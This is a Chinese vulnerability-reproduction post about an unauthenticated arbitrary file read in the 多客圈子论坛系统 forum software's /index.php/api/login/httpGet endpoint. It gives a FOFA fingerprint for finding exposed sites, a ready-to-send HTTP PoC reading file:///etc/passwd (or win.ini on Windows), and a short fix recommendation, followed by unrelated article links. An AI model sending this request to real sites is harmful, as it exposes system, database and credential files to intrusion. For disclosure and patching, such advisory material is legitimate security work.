当前位置: 首页 > news >正文

多客圈子论坛系统 httpGet 任意文件读取漏洞复现

0x01 产品简介

多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。

0x02 漏洞概述

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/static/index/js/jweixin-1.2.0.js"

0x04 漏洞复现

PoC

GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS:Windows读取C:/windows/win.ini

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 臻奶惠的行业优势与市场竞争力解析
  • Spring-Security(一)-源码分析及认证流程
  • 电子元器件批发的几种模式
  • 嵌入式C语言面试题笔试题
  • 华为和锐捷设备流统配置
  • Androidstudio项目加载不出来,显示Connect timed out
  • Android 应用加固与重签名—使用AndroidStudio自带工具 apksigner
  • go语言后端开发学习(一)——JWT的介绍以及基于JWT实现登录验证
  • 项目:基于httplib/消息队列负载均衡式在线OJ
  • 【计算机网络】个人学习笔记——第四章 网络层:CIDR编址IP地址子网掩码ICMP路由聚合与子网划分ARP协议
  • 工业无线通信解决方案,企业在进行智能化升级改造
  • vue3模板语法总结
  • ios 获取图片的一部分区域
  • 01 Linux网络设置
  • 调整SinoDB数据库日志模式
  • __proto__ 和 prototype的关系
  • 「译」Node.js Streams 基础
  • IDEA 插件开发入门教程
  • Koa2 之文件上传下载
  • Mac转Windows的拯救指南
  • MaxCompute访问TableStore(OTS) 数据
  • Objective-C 中关联引用的概念
  • PhantomJS 安装
  • Sublime Text 2/3 绑定Eclipse快捷键
  • Terraform入门 - 1. 安装Terraform
  • Vim 折腾记
  • WePY 在小程序性能调优上做出的探究
  • 闭包,sync使用细节
  • 前端相关框架总和
  • 前端知识点整理(待续)
  • 小试R空间处理新库sf
  • 3月7日云栖精选夜读 | RSA 2019安全大会:企业资产管理成行业新风向标,云上安全占绝对优势 ...
  • # centos7下FFmpeg环境部署记录
  • (07)Hive——窗口函数详解
  • (2024.6.23)最新版MAVEN的安装和配置教程(超详细)
  • (react踩过的坑)antd 如何同时获取一个select 的value和 label值
  • (八)c52学习之旅-中断实验
  • (二)windows配置JDK环境
  • (附源码)ssm经济信息门户网站 毕业设计 141634
  • (论文阅读22/100)Learning a Deep Compact Image Representation for Visual Tracking
  • (十)DDRC架构组成、效率Efficiency及功能实现
  • (十八)Flink CEP 详解
  • (十一)手动添加用户和文件的特殊权限
  • (算法)大数的进制转换
  • (一)Thymeleaf用法——Thymeleaf简介
  • (转)视频码率,帧率和分辨率的联系与区别
  • (轉貼) VS2005 快捷键 (初級) (.NET) (Visual Studio)
  • (最新)华为 2024 届秋招-硬件技术工程师-单板硬件开发—机试题—(共12套)(每套四十题)
  • .NET 8 中引入新的 IHostedLifecycleService 接口 实现定时任务
  • .NET Core 版本不支持的问题
  • .NetCore发布到IIS
  • .NET多线程执行函数
  • /etc/fstab 只读无法修改的解决办法
  • @Import注解详解
  • @JsonFormat与@DateTimeFormat注解的使用